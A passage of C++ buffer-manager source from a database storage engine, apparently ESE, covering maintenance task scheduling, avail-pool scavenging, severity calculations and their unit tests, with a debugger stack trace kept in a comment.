g_posttBFIMaintCacheStatsITask = NULL;
}
if ( g_posttBFIMaintTelemetryITask )
{
OSTimerTaskDelete( g_posttBFIMaintTelemetryITask );
g_posttBFIMaintTelemetryITask = NULL;
}
if ( g_posttBFIMaintCacheSizeITask )
{
OSTimerTaskDelete( g_posttBFIMaintCacheSizeITask );
g_posttBFIMaintCacheSizeITask = NULL;
}
if ( g_posttBFIMaintCheckpointITask )
{
OSTimerTaskDelete( g_posttBFIMaintCheckpointITask );
g_posttBFIMaintCheckpointITask = NULL;
}
if ( g_posttBFIMaintCheckpointDepthITask )
{
OSTimerTaskDelete( g_posttBFIMaintCheckpointDepthITask );
g_posttBFIMaintCheckpointDepthITask = NULL;
}
if ( g_posttBFIMaintAvailPoolIUrgentTask )
{
OSTimerTaskDelete( g_posttBFIMaintAvailPoolIUrgentTask );
g_posttBFIMaintAvailPoolIUrgentTask = NULL;
}
if ( g_posttBFIMaintAvailPoolITask )
{
OSTimerTaskDelete( g_posttBFIMaintAvailPoolITask );
g_posttBFIMaintAvailPoolITask = NULL;
}
// all tasks are now shutdown so release cancel lock
g_fBFMaintInitialized = fFalse;
g_blBFMaintScheduleCancel.Leave2();
}
// preferred
ERR ErrBFIMaintScheduleTask( POSTIMERTASK postt,
const VOID * const pvContext,
const TICK dtickDelay,
const TICK dtickSlop )
{
ERR err = JET_errSuccess;
BOOL fLeave1 = fFalse;
// in order to schedule a new task, we must be able to enter this lock as
// a scheduler
if ( !g_blBFMaintScheduleCancel.FTryEnter1() )
{
Error( ErrERRCheck( JET_errNotInitialized ) );
}
fLeave1 = fTrue;
if ( !g_fBFMaintInitialized )
{
FireWall( "ScheduleMaintUninitTimerTask" );
Error( ErrERRCheck( JET_errNotInitialized ) );
}
OSTimerTaskScheduleTask( postt, pvContext, dtickDelay, dtickSlop );
HandleError:
if ( fLeave1 )
{
g_blBFMaintScheduleCancel.Leave1();
}
return err;
}
// Concurrency simulation
// perhaps make this global and turn it on from the registry?
//#define BF_CC_SIM 1
INLINE BOOL FBFIChance( INT pctChance )
{
#ifdef BF_CC_SIM
return ( rand() % 100 ) < pctChance;
#else
return fFalse;
#endif
}
// incurs a random wait or task switch ...
INLINE void BFISynchronicity( void )
{
#ifdef BF_CC_SIM
if ( FBFIChance( 10 ) )
{
// 10% chance to switch to ready thread at same priority
UtilSleep( 0 );
}
else if ( FBFIChance( 10 ) )
{
// 9% chance to switch to any ready thread
UtilSleep( 1 );
}
else if ( FBFIChance( 10 ) )
{
// 8% chance ... broken down ...
if ( FBFIChance( 25 ) )
{
while ( FBFIChance( 50 ) )
{
// 1% sleep once 16 ms, .5% sleep 32 ms, .25% sleep 48 ms, so on ...
UtilSleep( 16 );
}
}
else
{
// 2% sleep 2 ms, 2% sleep 3 ms, 2% sleep 4 ms.
UtilSleep( rand() % 4 + 2 );
}
}
// else 73% chance to do nothing ...
#endif
}
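// Illustrative (hypothetical) usage: when BF_CC_SIM is defined, calls can be sprinkled at
// interesting interleaving points to shake out races, e.g.
//
//      pbf->sxwl.ReleaseWriteLatch();
//      BFISynchronicity(); // give other threads a chance to observe the released latch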
// Avail Pool
CSemaphore g_semMaintAvailPoolRequestUrgent( CSyncBasicInfo( _T( "g_semMaintAvailPoolRequestUrgent" ) ) );
CSemaphore g_semMaintAvailPoolRequest( CSyncBasicInfo( _T( "g_semMaintAvailPoolRequest" ) ) );
LONG_PTR cbfAvailPoolLow;
LONG_PTR cbfAvailPoolHigh;
LONG_PTR cbfAvailPoolTarget;
LONG_PTR cbfCacheDeadlock;
LONG_PTR g_cbfCacheDeadlockMax;
POSTIMERTASK g_posttBFIMaintAvailPoolIUrgentTask = NULL;
POSTIMERTASK g_posttBFIMaintAvailPoolITask = NULL;
// requests that maintenance be performed on the avail pool in either sync or
// async mode
ERR ErrBFIMaintAvailPoolRequest( const BFIMaintAvailPoolRequestType bfmaprt )
{
const BOOL fForceSync = ( bfmaprtSync == bfmaprt ); // technically not forced, as it still has to acquire g_semMaintScavenge
const BOOL fAllowSync = ( bfmaprtAsync != bfmaprt );
BOOL fRequestAsync = !fForceSync;
ERR err = JET_errSuccess;
OnDebug( BOOL fExecutedSync = fFalse );
// all these flags are exclusive ...
Assert( ( bfmaprtUnspecific == bfmaprt ) || ( bfmaprtSync == bfmaprt ) || ( bfmaprtAsync == bfmaprt ) );
Assert( !fForceSync || fAllowSync );
// ignore the request if we have enough available BFs and the deadlock threshold is not over the optimal cache size
// note that we don't have the proper locks to ensure consistent cbfCacheDeadlock and g_cbfCacheTargetOptimal values, which
// is acceptable because new requests will come in as new pages are allocated so we'll eventually do the right thing.
const DWORD cbfAvail = g_bfavail.Cobject();
if ( ( cbfAvail >= (DWORD)cbfAvailPoolHigh ) && ( cbfCacheDeadlock <= g_cbfCacheTargetOptimal ) )
{
goto HandleError;
}
const BOOL fSmallPool = ( ( cbfAvailPoolHigh - cbfAvailPoolLow ) < 10 ) || ( cbfAvailPoolLow < 5 );
const BOOL fLowPool = ( cbfAvail <= (DWORD)cbfAvailPoolLow );
if ( fForceSync || ( fAllowSync && fSmallPool && fLowPool ) )
{
// if no one else is currently maintaining the avail pool then we can proceed
if ( g_semMaintScavenge.FTryAcquire() )
{
// maintain the avail pool
//
// NOTE: we disable sync debugging below because we are logically
// becoming another context and the sync library is not flexible enough to
// understand this
// but I'm not sure this is correct ... it depends upon where we become
// another thread from ... as an example this stack ...
// has checkpoint locks ... and then tried to clear an OB0.
//
// TID 0x16b8 is a waiter for CReaderWriterLock 0x0000000052FC04E0 ( "CDynamicHashTable::BUCKET[0x0000000000000016]::m_rwlBucket", 65, 0 ) as Group 0.
// TID 0x16b8 is an owner of CSXWLatch 0x0000000002D34A20 ( "BFLatch Read/RDW/Write", 1000, 2147483647 ) as Group 2.
// TID 0x16b8 is an owner of CReaderWriterLock 0x0000000052FC04E0 ( "CDynamicHashTable::BUCKET[0x0000000000000016]::m_rwlBucket", 65, 0 ) as Group 0.
// TID 0x16b8 is an owner of CReaderWriterLock 0x00000000003D6F08 ( "BFFMPContext Updating/Accessing", 66, 0 ) as Group 1.
//
// Child-SP RetAddr Call Site
// 00000000`5486d028 000007fe`f2ed295e KERNELBASE!DebugBreak+0x2
// 00000000`5486d030 000007fe`f2ed3408 ese!UserDebugBreakPoint+0x45e [d:\src\e13\esefastdev1\sources\dev\ese\src\os\error.cxx @ 281]
// 00000000`5486dd30 000007fe`f2df2696 ese!AssertFail+0x978 [d:\src\e13\esefastdev1\sources\dev\ese\src\os\error.cxx @ 655]
// 00000000`5486df50 000007fe`f2ded386 ese!OSSYNC::CKernelSemaphore::FAcquire+0xe6 [d:\src\e13\esefastdev1\sources\dev\ese\src\sync\sync.cxx @ 4002]
// 00000000`5486dfb0 000007fe`f2a81299 ese!OSSYNC::CSemaphore::_FAcquire+0x206 [d:\src\e13\esefastdev1\sources\dev\ese\src\sync\sync.cxx @ 424]
// 00000000`5486e080 000007fe`f2a81239 ese!OSSYNC::CSemaphore::FAcquire+0x29 [d:\src\e13\esefastdev1\sources\dev\ese\published\inc\sync.hxx @ 2003]
// 00000000`5486e0c0 000007fe`f2df0daa ese!OSSYNC::CSemaphore::Acquire+0x19 [d:\src\e13\esefastdev1\sources\dev\ese\published\inc\sync.hxx @ 1961]
// 00000000`5486e100 000007fe`f2aa5e99 ese!OSSYNC::CReaderWriterLock::_EnterAsWriter+0x7a [d:\src\e13\esefastdev1\sources\dev\ese\src\sync\sync.cxx @ 2534]
// 00000000`5486e130 000007fe`f2abeb89 ese!OSSYNC::CReaderWriterLock::EnterAsWriter+0x189 [d:\src\e13\esefastdev1\sources\dev\ese\published\inc\sync.hxx @ 5759]
// 00000000`5486e170 000007fe`f2abcea2 ese!DHT::CDynamicHashTable<unsigned long,COLL::CApproximateIndex<unsigned long,RESMGR::CLRUKResourceUtilityManager<2,BF,&BF::OffsetOfLRUKIC,IFMPPGNO>::CHistory,&RESMGR::CLRUKResourceUtilityManager<2,BF,&BF::OffsetOfLRUKIC,IFMPPGNO>::CHistory::OffsetOfAIIC>::CBucket>::FDIRTryWriteLockKey+0x199 [d:\src\e13\esefastdev1\distrib\private\inc\dht.hxx @ 1005]
// 00000000`5486e200 000007fe`f2ab62f9 ese!DHT::CDynamicHashTable<unsigned long,COLL::CApproximateIndex<unsigned long,RESMGR::CLRUKResourceUtilityManager<2,BF,&BF::OffsetOfLRUKIC,IFMPPGNO>::CHistory,&RESMGR::CLRUKResourceUtilityManager<2,BF,&BF::OffsetOfLRUKIC,IFMPPGNO>::CHistory::OffsetOfAIIC>::CBucket>::FTryWriteLockKey+0xc2 [d:\src\e13\esefastdev1\distrib\private\inc\dht.hxx @ 4004]
// 00000000`5486e250 000007fe`f2aaef19 ese!COLL::CApproximateIndex<unsigned __int64,BF,&BF::OffsetOfOB0IC>::FTryLockKeyPtr+0x59 [d:\src\e13\esefastdev1\distrib\private\inc\collection.hxx @ 1162]
// 00000000`5486e290 000007fe`f2aa8ab8 ese!COLL::CApproximateIndex<unsigned __int64,BF,&BF::OffsetOfOB0IC>::LockKeyPtr+0x39 [d:\src\e13\esefastdev1\distrib\private\inc\collection.hxx @ 1144]
// 00000000`5486e2e0 000007fe`f2aa1721 ese!BFIResetLgposOldestBegin0+0x1a8 [d:\src\e13\esefastdev1\sources\dev\ese\src\ese\bf.cxx @ 19324]
// 00000000`5486e410 000007fe`f2a84d37 ese!ErrBFIEvictPage+0x521 [d:\src\e13\esefastdev1\sources\dev\ese\src\ese\bf.cxx @ 16937]
// 00000000`5486e5c0 000007fe`f2a83199 ese!ErrBFIMaintScavengeIScavengePages+0x1b7 [d:\src\e13\esefastdev1\sources\dev\ese\src\ese\bf.cxx @ 7956]
// 00000000`5486e810 000007fe`f2a92410 ese!ErrBFIMaintAvailPoolRequest+0xe9 [d:\src\e13\esefastdev1\sources\dev\ese\src\ese\bf.cxx @ 7516]
// 00000000`5486e880 000007fe`f2a77ea1 ese!ErrBFIAllocPage+0xf0 [d:\src\e13\esefastdev1\sources\dev\ese\src\ese\bf.cxx @ 11881]
// 00000000`5486e8f0 000007fe`f2a7806b ese!BFIAlloc+0x161 [d:\src\e13\esefastdev1\sources\dev\ese\src\ese\bf.cxx @ 3061]
// 00000000`5486e960 000007fe`f2b695c0 ese!BFAlloc+0x3b [d:\src\e13\esefastdev1\sources\dev\ese\src\ese\bf.cxx @ 3115]
// 00000000`5486e990 000007fe`f2b6a38a ese!CPAGE::ReorganizeData_+0xa0 [d:\src\e13\esefastdev1\sources\dev\ese\src\ese\cpage.cxx @ 4181]
// 00000000`5486ea30 000007fe`f2aa2f91 ese!CPAGE::DehydratePage+0x1fa [d:\src\e13\esefastdev1\sources\dev\ese\src\ese\cpage.cxx @ 4499]
// 00000000`5486eaf0 000007fe`f2aa2b80 ese!BFIDehydratePage+0x371 [d:\src\e13\esefastdev1\sources\dev\ese\src\ese\bf.cxx @ 17523]
// 00000000`5486eba0 000007fe`f2aa7706 ese!BFICleanPage+0x580 [d:\src\e13\esefastdev1\sources\dev\ese\src\ese\bf.cxx @ 17417]
// 00000000`5486ec10 000007fe`f2aa0b0a ese!BFIFlushComplete+0x2d6 [d:\src\e13\esefastdev1\sources\dev\ese\src\ese\bf.cxx @ 18674]
// 00000000`5486ecd0 000007fe`f2a9ec6a ese!FBFICompleteFlushPage+0x8a [d:\src\e13\esefastdev1\sources\dev\ese\src\ese\bf.cxx @ 16654]
// 00000000`5486ed10 000007fe`f2aa05fa ese!ErrBFIAcquireExclusiveLatchForFlush+0x5a [d:\src\e13\esefastdev1\sources\dev\ese\src\ese\bf.cxx @ 16114]
// 00000000`5486ed50 000007fe`f2a8b2d4 ese!ErrBFIFlushPage+0xaa [d:\src\e13\esefastdev1\sources\dev\ese\src\ese\bf.cxx @ 16584]
// 00000000`5486ee00 000007fe`f2a8bcf3 ese!ErrBFIOB0MaintEntry+0x354 [d:\src\e13\esefastdev1\sources\dev\ese\src\ese\bf.cxx @ 9575]
// 00000000`5486ee90 000007fe`f2a8ca45 ese!ErrBFIOB0MaintScan+0x703 [d:\src\e13\esefastdev1\sources\dev\ese\src\ese\bf.cxx @ 9756]
// 00000000`5486ef90 000007fe`f2a8a4be ese!ErrBFIMaintCheckpointDepthIFlushPagesByIFMP+0x935 [d:\src\e13\esefastdev1\sources\dev\ese\src\ese\bf.cxx @ 10196]
// 00000000`5486f370 000007fe`f2a89fba ese!BFIMaintCheckpointDepthIFlushPages+0x2ae [d:\src\e13\esefastdev1\sources\dev\ese\src\ese\bf.cxx @ 9206]
// 00000000`5486f420 000007fe`f2eefe7e ese!BFIMaintCheckpointDepthITask+0x8a [d:\src\e13\esefastdev1\sources\dev\ese\src\ese\bf.cxx @ 9103]
//
// We should re-enable this deadlock detection in the future and determine
// what the real problems are here ... and see if they can be fixed
// more elegantly.
//
CLockDeadlockDetectionInfo::DisableOwnershipTracking();
CLockDeadlockDetectionInfo::DisableDeadlockDetection();
if ( fForceSync )
{
err = ErrBFIMaintScavengeIScavengePages( __FUNCTION__, fTrue );
}
else
{
(void)ErrBFIMaintScavengeIScavengePages( __FUNCTION__, fFalse );
}
OnDebug( fExecutedSync = fTrue );
CLockDeadlockDetectionInfo::EnableDeadlockDetection();
CLockDeadlockDetectionInfo::EnableOwnershipTracking();
g_semMaintScavenge.Release();
// because we just performed maintenance, we can rule out the
// need to perform it async
fRequestAsync = fFalse;
}
}
// if we still need to maintain the avail pool then try to schedule an attempt in the near future
if ( fRequestAsync )
{
const BOOL fUrgent = fLowPool;
CSemaphore* const psemMaintAvailPoolRequest = fUrgent ? &g_semMaintAvailPoolRequestUrgent : &g_semMaintAvailPoolRequest;
if ( psemMaintAvailPoolRequest->FTryAcquire() )
{
const ERR errSchedule = fUrgent ?
ErrBFIMaintScheduleTask( g_posttBFIMaintAvailPoolIUrgentTask, NULL, dtickMaintAvailPoolRequestUrgent, 0 ) :
ErrBFIMaintScheduleTask( g_posttBFIMaintAvailPoolITask, NULL, dtickMaintAvailPoolRequest, 0 );
if ( errSchedule < JET_errSuccess )
{
psemMaintAvailPoolRequest->Release();
}
}
}
HandleError:
#ifdef DEBUG
if ( err != JET_errSuccess )
{
Expected( fForceSync && fExecutedSync );
Expected( ( err == wrnSlow ) || ( err == JET_errOutOfBuffers ) || ( err == JET_errOutOfMemory ) );
}
#endif
return err;
}
// executes the actual task to maintain the avail pool
void BFIMaintAvailPoolITask_( CSemaphore* const psemMaintAvailPoolRequest )
{
// this task automatically has the right to async maintenance
Assert( psemMaintAvailPoolRequest->CAvail() == 0 );
// if no one else is currently scavenging then we can
// proceed. otherwise, this async request will be ignored
if ( g_semMaintScavenge.FTryAcquire() )
{
// scavenge
(void)ErrBFIMaintScavengeIScavengePages( __FUNCTION__, fFalse );
g_semMaintScavenge.Release();
}
Assert( psemMaintAvailPoolRequest->CAvail() == 0 );
psemMaintAvailPoolRequest->Release();
}
// executes an urgent async request to maintain the avail pool
void BFIMaintAvailPoolIUrgentTask( void*, void* )
{
OSTrace( JET_tracetagBufferManagerMaintTasks, __FUNCTION__ );
BFIMaintAvailPoolITask_( &g_semMaintAvailPoolRequestUrgent );
}
// executes an async request to maintain the avail pool
void BFIMaintAvailPoolITask( void*, void* )
{
OSTrace( JET_tracetagBufferManagerMaintTasks, __FUNCTION__ );
BFIMaintAvailPoolITask_( &g_semMaintAvailPoolRequest );
}
// Scavenging
CSemaphore g_semMaintScavenge( CSyncBasicInfo( _T( "g_semMaintScavenge" ) ) );
// We track the last several runs
TICK g_dtickMaintScavengeTimeout = 0;
size_t g_cScavengeTimeSeq = 0;
ULONG g_iScavengeLastRun = 0;
BFScavengeStats* g_rgScavengeLastRuns = NULL; // [ OnDebugOrRetailOrRtm( 150, 30, 4 ) ]; // should always be at least 1 ...
// We track a time sequence of the last OOB timeout seconds
ULONG g_iScavengeTimeSeqLast = 0;
BFScavengeStats* g_rgScavengeTimeSeq = NULL; // currently every 500 ms for either JET_paramHungIOThreshold (in RETAIL) or
// ( 2 * JET_paramHungIOThreshold ) (in DEBUG) + few extra runs.
// ( 2 * JET_paramHungIOThreshold ) (in DEBUG) + a few extra runs.
#ifndef RTM
// uses same g_iScavengeTimeSeqLast as g_rgScavengeTimeSeq
BFScavengeStats* g_rgScavengeTimeSeqCumulative = NULL;
#endif // !RTM
#ifdef DEBUG
BOOL g_modeExtraScavengingRuns = 0; // in mode = 0 or 1, no extra runs, mode 2 = 50% prob of extra run per iteration
#endif
// Tracking vars, to give us context on how cache size evolved.
LONG g_cCacheBoosts = 0;
__int64 g_cbCacheBoosted = 0;
// Determines the severity of current state of avail pool maintenance.
INLINE ULONG UlBFIMaintScavengeAvailPoolSev( const BFScavengeStats& stats )
{
Assert( stats.cbfAvailPoolTarget >= stats.cbfAvailPoolLow );
// Below low threshold, max severity.
if ( stats.cbfAvail < stats.cbfAvailPoolLow )
{
return ulMaintScavengeSevMax;
}
// Above target, min severity.
if ( stats.cbfAvail >= stats.cbfAvailPoolTarget )
{
return ulMaintScavengeSevMin;
}
// Unlikely, but just in case.
if ( ( stats.cbfAvailPoolTarget - 1 ) <= stats.cbfAvailPoolLow )
{
return ulMaintScavengeSevMax - 1;
}
// Otherwise, scale linearly.
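// Illustrative example (values match the unit test below): with cbfAvailPoolLow = 20000,
// cbfAvailPoolTarget = 30000 and cbfAvail = 25000, this computes
// 1 + ( 998 * ( 29999 - 25000 ) ) / ( 29999 - 20000 ) = 1 + ( 998 * 4999 ) / 9999 = 499.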
return ( ulMaintScavengeSevMin + 1 ) +
(ULONG)( ( ( (__int64)( ( ulMaintScavengeSevMax - 1 ) - ( ulMaintScavengeSevMin + 1 ) ) ) *
( (__int64)( ( stats.cbfAvailPoolTarget - 1 ) - stats.cbfAvail ) ) ) /
( (__int64)( ( stats.cbfAvailPoolTarget - 1 ) - stats.cbfAvailPoolLow ) ) );
}
#ifdef ENABLE_JET_UNIT_TEST
JETUNITTEST( BF, BufferScavengingAvailPoolSev )
{
BFScavengeStats stats = { 0 };
static_assert( ulMaintScavengeSevMin == 0, "ulMaintScavengeSevMin is assumed 0." );
static_assert( ulMaintScavengeSevMax == 1000, "ulMaintScavengeSevMax is assumed 1000." );
stats.cbfAvailPoolLow = 20000;
stats.cbfAvailPoolTarget = 30000;
// Available pool well below low threshold.
stats.cbfAvail = 1;
CHECK( 1000 == UlBFIMaintScavengeAvailPoolSev( stats ) );
// Available pool barely below low threshold.
stats.cbfAvail = 19999;
CHECK( 1000 == UlBFIMaintScavengeAvailPoolSev( stats ) );
// Available pool at low threshold.
stats.cbfAvail = 20000;
CHECK( 999 == UlBFIMaintScavengeAvailPoolSev( stats ) );
// Available pool 25% between low and target.
stats.cbfAvail = 22500;
CHECK( 749 == UlBFIMaintScavengeAvailPoolSev( stats ) );
// Available pool 50% between low and target.
stats.cbfAvail = 25000;
CHECK( 499 == UlBFIMaintScavengeAvailPoolSev( stats ) );
// Available pool 75% between low and target.
stats.cbfAvail = 27500;
CHECK( 250 == UlBFIMaintScavengeAvailPoolSev( stats ) );
// Available pool barely below target threshold.
stats.cbfAvail = 29999;
CHECK( 1 == UlBFIMaintScavengeAvailPoolSev( stats ) );
// Available pool at target threshold.
stats.cbfAvail = 30000;
CHECK( 0 == UlBFIMaintScavengeAvailPoolSev( stats ) );
// Available pool barely above target threshold.
stats.cbfAvail = 30001;
CHECK( 0 == UlBFIMaintScavengeAvailPoolSev( stats ) );
// Available pool well above target threshold.
stats.cbfAvail = 100000;
CHECK( 0 == UlBFIMaintScavengeAvailPoolSev( stats ) );
// Degenerated cases: target barely above low threshold.
stats.cbfAvailPoolLow = 20000;
stats.cbfAvailPoolTarget = 20001;
stats.cbfAvail = 19999;
CHECK( 1000 == UlBFIMaintScavengeAvailPoolSev( stats ) );
stats.cbfAvail = 20000;
CHECK( 999 == UlBFIMaintScavengeAvailPoolSev( stats ) );
stats.cbfAvail = 20001;
CHECK( 0 == UlBFIMaintScavengeAvailPoolSev( stats ) );
}
#endif // ENABLE_JET_UNIT_TEST
// Determines the severity of current state of shrink.
INLINE ULONG UlBFIMaintScavengeShrinkSev( const BFScavengeStats& stats )
{
// Shrink has just started, min severity.
if ( stats.dtickShrinkDuration == 0 )
{
return ulMaintScavengeSevMin;
}
const LONG dcbfShrinkDeficit = stats.cbfCacheSize - stats.cbfCacheTarget;
// No deficit, min severity.
if ( dcbfShrinkDeficit <= 0 )
{
return ulMaintScavengeSevMin;
}
// The target can be greater than the initial shrink cache size if a cache resize was requested while scavenging
// was running, before a previous shrink target was reached. In that case, the cache size will most likely already
// be below the new target, but we handle it here to avoid divide-by-zero and other math issues below.
const LONG cbfCacheSizeStartShrink = LFunctionalMax( stats.cbfCacheSizeStartShrink, stats.cbfCacheTarget );
const LONG dcbfShrinkRange = cbfCacheSizeStartShrink - stats.cbfCacheTarget;
// The shrink target increases linearly as the time passes.
const __int64 cbfCacheSizeExpected = (__int64)cbfCacheSizeStartShrink -
( ( (__int64)dcbfShrinkRange ) * ( (__int64)stats.dtickShrinkDuration ) ) / ( (__int64)dtickMaintScavengeShrinkMax );
const LONG dcbfCacheSizeDiscrepancy = LFunctionalMin( stats.cbfCacheSize - (LONG)max( cbfCacheSizeExpected, 0 ), dcbfShrinkRange + 1 );
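// Illustrative example (values match the unit test below, assuming dtickMaintScavengeShrinkMax = 30 * 1000):
// with cbfCacheSizeStartShrink = 30000 and cbfCacheTarget = 20000 (range = 10000), at dtickShrinkDuration = 15000
// the expected cache size is 30000 - ( 10000 * 15000 ) / 30000 = 25000; a current cache size of 27500 then gives
// a discrepancy of 2500 and a final severity of 1 + ( 998 * 2500 ) / 10000 = 250.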
// Cache is already at or below expected size, min severity.
if ( dcbfCacheSizeDiscrepancy <= 0 )
{
return ulMaintScavengeSevMin;
}
// We're past due, max severity.
if ( dcbfCacheSizeDiscrepancy > dcbfShrinkRange )
{
return ulMaintScavengeSevMax;
}
// Otherwise, scale linearly.
return ( ulMaintScavengeSevMin + 1 ) +
(ULONG)( ( ( (__int64)( ( ulMaintScavengeSevMax - 1 ) - ( ulMaintScavengeSevMin + 1 ) ) ) *
( (__int64)dcbfCacheSizeDiscrepancy ) ) / ( (__int64)dcbfShrinkRange ) );
}
#ifdef ENABLE_JET_UNIT_TEST
JETUNITTEST( BF, BufferScavengingShrinkSev )
{
BFScavengeStats stats = { 0 };
static_assert( ulMaintScavengeSevMin == 0, "ulMaintScavengeSevMin is assumed 0." );
static_assert( ulMaintScavengeSevMax == 1000, "ulMaintScavengeSevMax is assumed 1000." );
static_assert( dtickMaintScavengeShrinkMax == 30 * 1000, "dtickMaintScavengeShrinkMax is assumed 30 * 1000." );
stats.cbfCacheSizeStartShrink = 30000;
stats.cbfCacheTarget = 20000;
// Severity is always 0 if we're just starting.
stats.dtickShrinkDuration = 0;
stats.cbfCacheSize = 15000;
CHECK( 0 == UlBFIMaintScavengeShrinkSev( stats ) );
stats.cbfCacheSize = 20000;
CHECK( 0 == UlBFIMaintScavengeShrinkSev( stats ) );
stats.cbfCacheSize = 25000;
CHECK( 0 == UlBFIMaintScavengeShrinkSev( stats ) );
stats.cbfCacheSize = 30000;
CHECK( 0 == UlBFIMaintScavengeShrinkSev( stats ) );
stats.cbfCacheSize = 35000;
CHECK( 0 == UlBFIMaintScavengeShrinkSev( stats ) );
// Severity is always 0 if there's no deficit.
stats.cbfCacheSize = 20000;
stats.dtickShrinkDuration = 15 * 1000;
CHECK( 0 == UlBFIMaintScavengeShrinkSev( stats ) );
stats.dtickShrinkDuration = 45 * 1000;
CHECK( 0 == UlBFIMaintScavengeShrinkSev( stats ) );
stats.cbfCacheSize = 10000;
stats.dtickShrinkDuration = 15 * 1000;
CHECK( 0 == UlBFIMaintScavengeShrinkSev( stats ) );
stats.dtickShrinkDuration = 45 * 1000;
CHECK( 0 == UlBFIMaintScavengeShrinkSev( stats ) );
// Duration 25% through, varying cache sizes.
//
stats.dtickShrinkDuration = 7500;
// Cache size still stuck at initial size.
stats.cbfCacheSize = 30000;
CHECK( 250 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache size half of ideal progress.
stats.cbfCacheSize = 28750;
CHECK( 125 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache 10% above expected.
stats.cbfCacheSize = 27750;
CHECK( 25 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache size making progress as expected.
stats.cbfCacheSize = 27500;
CHECK( 0 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache size ahead of expected.
stats.cbfCacheSize = 25000;
CHECK( 0 == UlBFIMaintScavengeShrinkSev( stats ) );
// Duration halfway through, varying cache sizes.
//
stats.dtickShrinkDuration = 15 * 1000;
// Cache size still stuck at initial size.
stats.cbfCacheSize = 30000;
CHECK( 500 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache size half of ideal progress.
stats.cbfCacheSize = 27500;
CHECK( 250 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache 10% above expected.
stats.cbfCacheSize = 25500;
CHECK( 50 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache size making progress as expected.
stats.cbfCacheSize = 25000;
CHECK( 0 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache size ahead of expected.
stats.cbfCacheSize = 22500;
CHECK( 0 == UlBFIMaintScavengeShrinkSev( stats ) );
// Duration 75% through, varying cache sizes.
//
stats.dtickShrinkDuration = 22500;
// Cache size still stuck at initial size.
stats.cbfCacheSize = 30000;
CHECK( 749 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache size half of ideal progress.
stats.cbfCacheSize = 26250;
CHECK( 375 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache 10% above expected.
stats.cbfCacheSize = 23250;
CHECK( 75 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache size making progress as expected.
stats.cbfCacheSize = 22500;
CHECK( 0 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache size ahead of expected.
stats.cbfCacheSize = 21000;
CHECK( 0 == UlBFIMaintScavengeShrinkSev( stats ) );
// Duration all the way through, varying cache sizes.
//
stats.dtickShrinkDuration = 30 * 1000;
// Cache size still stuck at initial size.
stats.cbfCacheSize = 30000;
CHECK( 999 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache size half of ideal progress.
stats.cbfCacheSize = 25000;
CHECK( 500 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache 10% above target.
stats.cbfCacheSize = 21000;
CHECK( 100 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache size exactly at target.
stats.cbfCacheSize = 20000;
CHECK( 0 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache size lower than target.
stats.cbfCacheSize = 15000;
CHECK( 0 == UlBFIMaintScavengeShrinkSev( stats ) );
// Duration 1.5x past due, varying cache sizes.
//
stats.dtickShrinkDuration = 45 * 1000;
// Cache size still stuck at initial size.
stats.cbfCacheSize = 30000;
CHECK( 1000 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache size half of ideal progress.
stats.cbfCacheSize = 25000;
CHECK( 999 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache 10% above target.
stats.cbfCacheSize = 21000;
CHECK( 599 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache size exactly at target.
stats.cbfCacheSize = 20000;
CHECK( 0 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache size lower than target.
stats.cbfCacheSize = 15000;
CHECK( 0 == UlBFIMaintScavengeShrinkSev( stats ) );
// Duration 2x past due, varying cache sizes.
//
stats.dtickShrinkDuration = 60 * 1000;
// Cache size still stuck at initial size.
stats.cbfCacheSize = 30000;
CHECK( 1000 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache size half of ideal progress.
stats.cbfCacheSize = 25000;
CHECK( 1000 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache barely above target.
stats.cbfCacheSize = 20100;
CHECK( 1000 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache size exactly at target.
stats.cbfCacheSize = 20000;
CHECK( 0 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache size lower than target.
stats.cbfCacheSize = 15000;
CHECK( 0 == UlBFIMaintScavengeShrinkSev( stats ) );
// Duration way past due, varying cache sizes.
//
stats.dtickShrinkDuration = 240 * 1000;
// Cache size still stuck at initial size.
stats.cbfCacheSize = 30000;
CHECK( 1000 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache size half of ideal progress.
stats.cbfCacheSize = 25000;
CHECK( 1000 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache 10% above target.
stats.cbfCacheSize = 21000;
CHECK( 1000 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache size exactly at target.
stats.cbfCacheSize = 20000;
CHECK( 0 == UlBFIMaintScavengeShrinkSev( stats ) );
// Cache size lower than target.
stats.cbfCacheSize = 15000;
CHECK( 0 == UlBFIMaintScavengeShrinkSev( stats ) );
}
#endif // ENABLE_JET_UNIT_TEST
// Determines the QOS of the scavenge-related I/O based on the current progress of buffer scavenging.
INLINE OSFILEQOS QosBFIMaintScavengePages( const ULONG_PTR ulIoPriority, const ULONG ulScavengeSev )
{
OSFILEQOS qosIoOsPriority = qosIOOSNormalPriority;
OSFILEQOS qosIoDispatch = qosIODispatchImmediate;
Assert( ( ulScavengeSev >= ulMaintScavengeSevMin ) && ( ulScavengeSev <= ulMaintScavengeSevMax ) );
// Maximum severity.
if ( ulScavengeSev == ulMaintScavengeSevMax )
{
goto HandleError;
}
// Determine OS priority.
if ( ( ulIoPriority & JET_IOPriorityLowForScavenge ) != 0 )
{
qosIoOsPriority = qosIOOSLowPriority;
}
// Determine dispatch urgency.
// Minimum severity.
if ( ulScavengeSev == ulMaintScavengeSevMin )
{
